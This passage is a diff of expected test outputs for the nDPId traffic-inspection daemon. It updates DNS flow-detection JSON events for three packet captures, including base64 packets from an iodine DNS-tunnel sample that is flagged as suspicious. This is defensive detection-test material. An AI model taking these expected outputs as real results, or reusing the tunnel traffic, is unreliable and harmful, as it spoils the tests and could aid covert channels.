@@ -2,10 +2,10 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946734886956} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946734886956,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":946734886956,"pkt":"AAAAAAAAAAAAAAAACABFAABMyRJAAEARc4x\/AAABfwAAAYyMADUAOP5Ln2wBAAABAAAAAAAAA3d3dxdhbGx5b3VyYmEEBQZhcmViZWxvbmd0bwJjbgAAAQAB"} 
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourba???arebelongto.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946734886956,"flow_last_seen":946734886956,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":946734886956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourba???arebelongto.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946734886957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":946734886957,"pkt":"AAAAAAAAAAAAAAAACABFAABcAABAAEARPI9\/AAABfwAAAQA1jIwASP5bn2yBgAABAAEAAAAAA3d3dxdhbGx5b3VyYmFzZXNhcmUBAgNvbmd0bwJjbgAAAQABwAwAAQABAAAAPAAEE7mN8Q=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourbasesare???ongto.cn","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"19.185.141.241"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.allyourbasesare???ongto.cn","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"19.185.141.241"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946734886956,"flow_last_seen":946734886957,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":946734886957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35980,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns-invalid-chars.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":112,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946734886957} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 802 chars diff --git a/test/results/dns-tunnel-iodine.pcap.out b/test/results/dns-tunnel-iodine.pcap.out index 476e4bf12..4b613d8ca 100644 --- a/test/results/dns-tunnel-iodine.pcap.out +++ b/test/results/dns-tunnel-iodine.pcap.out 
@@ -2,11 +2,11 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1282356640051} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1282356640051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1282356640051,"pkt":"CAAnx266CAAnnOC0CABFAABEAABAAEARIngKAAIeCgACFK5fADUAMAHkErABAAABAAAAAAAAC3ZhYWFha2FyZGxpBnBpcmF0ZQNzZWEAAAoAAQ=="} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":0,"num_answers":0,"reply_code":0,"query_type":10,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":0,"num_answers":0,"reply_code":0,"query_type":10,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1282356640051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1282356640051,"pkt":"CAAnnOC0CAAnx266CABFAABZAABAAEARImMKAAIUCgACHgA1rl8ARRoeErCEAAABAAEAAAAAC3ZhYWFha2FyZGxpBnBpcmF0ZQNzZWEAAAoAAcAMAAoAAQAAAAAACVZBQ0tEA8XpAQ=="} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":1,"num_answers":1,"reply_code":0,"query_type":10,"rsp_type":10,"rsp_addr":"0.0.0.0"}} 
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":1,"num_answers":1,"reply_code":0,"query_type":10,"rsp_type":10,"rsp_addr":"0.0.0.0"}} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1282356640051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1282356640051,"pkt":"CAAnx266CAAnnOC0CABFAABZAABAAEARImMKAAIeCgACFK5fADUARcobMN8BAAABAAAAAAAAIGxhZWdwdW1pcGxoaHB6MTJ5bmQxZWZsandsa2pjZ3d5BnBpcmF0ZQNzZWEAAAoAAQ=="} 
-00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1282356640051,"flow_last_seen":1282356664538,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1470,"flow_tot_l4_payload_len":52024,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1282356664538,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1282356640051,"flow_last_seen":1282356664538,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1470,"flow_tot_l4_payload_len":52024,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1282356664538,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","packets-captured":438,"packets-processed":434,"total-skipped-flows":0,"total-l4-payload-len":52024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1282356664538} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 438/434 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882054 bytes -~~ total memory freed........: 5882054 bytes -~~ total allocations/frees...: 118549/118549 +~~ total memory allocated....: 6015688 bytes +~~ total memory freed........: 6015688 bytes +~~ total allocations/frees...: 121311/121311 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 919 chars diff --git a/test/results/dns_ambiguous_names.pcap.out b/test/results/dns_ambiguous_names.pcap.out index 499dabab8..bac652542 100644 --- a/test/results/dns_ambiguous_names.pcap.out +++ b/test/results/dns_ambiguous_names.pcap.out 
@@ -2,64 +2,64 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625744123717} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625744123717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1625744123717,"pkt":"ABshv2HAVASmitEsCABFAABS3sIAAEARfvYKyAILCAgICLz3ADUAPh0yZjEBIAABAAAAAAABCjQxLWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAQAAKRAAAAAAAAAA"} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00814{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625744123759,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1625744123759,"pkt":"VASmitEsEL9IThY0CABFAAEwD4cAADwRUVQICAgICsgCCwA1vPcBHJeKZjGBgAABAAoAAAABCjQxLWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAJNcAJgI0MRJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAOwAgEmV1LW5vcnRoLWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAARAAQROZKLwGkAAQABAAAAEQAEETmSisBpAAEAAQAAABEABBE5kofAaQABAAEAAAARAAQROZKIwGkAAQABAAAAEQAEETmSicBpAAEAAQAAABEABBE5koTAaQABAAEAAAARAAQROZKGwGkAAQABAAAAEQAEETmShQAAKQIAAAAAAAAA"} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744123759,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.146.139"}} 
+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744123759,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.146.139"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625744123764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1625744123764,"pkt":"ABshv2HAVASmitEsCABFAABI3soAAEARfvgKyAILCAgICN\/KADUANB0owxkBIAABAAAAAAABBXRlYW1zBXNreXBlA2NvbQAAAQABAAApEAAAAAAAAAA="} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625744123792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1625744123792,"pkt":"VASmitEsEL9IThY0CABFAAB5Cy0AADwRVmUICAgICsgCCwA138oAZUD8wxmBgAABAAIAAAABBXRlYW1zBXNreXBlA2NvbQAAAQABwAwABQABAAAIAwAVBnMtMDAwMQhzLW1zZWRnZQNuZXQAwC0AAQABAAAAqAAEDWsDgAAAKQIAAAAAAAAA"} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744123792,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 